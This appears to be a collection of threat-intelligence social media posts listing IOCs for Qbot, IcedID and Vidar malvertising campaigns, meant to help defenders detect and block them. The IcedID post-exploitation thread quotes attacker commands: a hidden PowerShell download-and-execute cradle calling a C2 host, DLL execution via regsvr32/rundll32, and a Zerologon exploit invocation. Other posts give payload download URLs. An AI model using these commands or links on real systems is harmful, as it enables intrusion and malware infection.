Incoming BB14 #qbot .one campaign, hijacked threads, OneNote names:

item.one
notes.one
cancellation.one

dll links:
https://nerulgymkhana[.]com/CCoN/01.gif
https://tassoinmobiliaria[.]com/56G0/01.gif

c2:
92.177.204.2

hash:
7a8860f6975853e167c121a6c28b3f60c011e8aa93130856f73d9df688ec589f

Hopefully everyone is staying safe with the #malvertising campaigns during tax season.

Sophos has observed further activity stemming from #IcedID mimicking the IRS.

🔍️ Search term: "w-9 form 2023"
➡️ Abuse of Google #adsense
↪️ Redirected to fake IRS site
⏩️ \AppData\Local\Temp\Temp1_IRS_form_package.zip\IRS_form_package.exe

C2 connection: druidfenixis[.]com

Sample hosted on Firebase: hxxps://firebasestorage.googleapis[.]com/v0/b/fleet-muse-370809.appspot.com/o/frHfwF6lkh%2FIRS_form_package_24-01-2023_18-35-16.zip?alt=media&token=0e8837df-a50b-4ac9-8b35-fe6d869c717b

#threatintel

Hey :)

We published a detailed report on #Vidar infrastructure management, explaining how they are working. We also share malware configuration extractor over the C2, backend IPs, etc:

https://team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure

Happy Hunting and feedback warmly welcomed 😊

@teamcymru_S2

#IcedID C2s for blocking!

tibloautonef[.]com - 94.140.114[.]228
nomaeradiur[.]com - 94.140.114[.]228
trotimera[.]com - 5.255.107[.]149
swordnifhing[.]com - 5.255.107[.]149
trustopaj[.]com - 45.82.247[.]121
ulrtonemio[.]com - 45.82.247[.]121
rolewzullo[.]com - 85.239.60[.]241
trastbaki[.]com - 85.239.60[.]241
iskopila[.]com - 94.232.46[.]210
scanproluet[.]com - 45.89.98[.]138
spotifrezise[.]com - 80.66.88[.]87
headertolz[.]com - 80.66.88[.]87

The threat actors involved in the current malvertising campaigns via Google ads are even outbidding official brands.

(this was reported to Google)

Chain:
timviwer[.]site
wvwteamviewer[.]top

Payload:
firebasestorage[.]googleapis[.]com/v0/b/psychic-valve-370812.appspot.com/o/rt7635VXeJ%2FSetup_Win_19-01-2023_16-54-08.zip?alt=media&token=c7719ef4-8c00-400b-9cec-288395301241

During the past several weeks, there has been a dramatic increase in malvertising via Google ads.

The concern is that a lot of people (customers, but also your family and friends) are going to download malware or get scammed when performing common searches.

While it’s unclear what impact the recent layoffs at Google will have, I’ve decided with some fellow researchers to work together and aggregate this malvertising data.

We’re adding information about current malware campaigns and sharing it in real-time with contacts at Google.

If you would like to join this effort, please get in touch and I will provide more details.

For the past couple of weeks, #IcedID has been hitting hard, with post-exploitation activities beginning within ~1 hour from the initial infection.

Here are some TTPs and IOCs from these post-exploitation activities that will keep defenders ready.

🎯TTPs🎯
➡️IcedID use of VNC
💡Over port 8080
➡️Multiple Cobalt Strike DLLs on disk
💡Overused directories - "C:\Windows\Tasks" & - "%user%\AppData\Local\Temp"
➡️Heavy use of PowerShell
💡Downloading payloads, exec PowerShell Cobalt Strike Loaders & other processes

➡️Used multiple privilege escalation methods
💡zerologon, Invoke-Kerberoast, Invoke-EnvBypass
➡️Reverse proxy via Cobalt Strike and then RDPing into the network
➡️Invoke-BloodHound & Invoke-ShareFinder for network and open-shares discovery

🛡️IOCs🛡️
➡️Cobalt Strike C2 & staging servers
💡23.227.202.66 - allowedcloud\.com
💡64.227.8.75:80 (Hosting files & possible redirector pointing to allowedcloud\.com)
💡80.77.25.65:443 - jumptoupd\.com

➡️Cobalt Strike payload execution
💡regsvr32.exe /s C:\Users\<user>\AppData\Local\Temp\<DLL>
💡rundll32.exe /s c:\windows\tasks\<DLL>,NtSetSystemTime
💡powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('hxxp://allowedcloud\.com:80/ItsMyBIT'))"

➡️IcedID C2 Servers
💡51.195.169.87:8080 - VNC connections
💡185.99.133.122:443
💡23.254.202.234:443
💡89.44.9.157:443

7/x
➡️Zerologon exploit - virustotal.com/gui/file/36bc3…
💡zero.exe [DC IP ADDRESS] [DOMAIN NAME] [DOMAIN ADMIN] -c "whoami > [RESULTED OUTPUT DIR/FILE]"
8/end
These are the most common TTPs and some new IOCs related to IcedID Hands-On-Keyboard post-exploitation activities.

Thanks to @@pr0xylife for sharing the IcedID samples 🙏

Get additional context along with more IOCs like these @ https://thedfirreport.com/services

Stay safe💙
#infosec #incidentresponse #threatintel #IOC

#IcedID C2's for blocking

5.230.74[.]203
qzmeat[.]cyou
felzater[.]lol

168.100.9[.]112
brigottafkor[.]com
kaesanor[.]homes

216.73.159[.]134
startevopadra[.]com

207.154.221[.]213
tailwera[.]cloud
jozzinafkae[.]com
pleoweld[.]homes
quelasoup[.]homes

5.230.68[.]48
ijoyzymama[.]com
skaiortalop[.]com

185.99.133[.]122
elcapolis[.]com
ertusaporf[.]com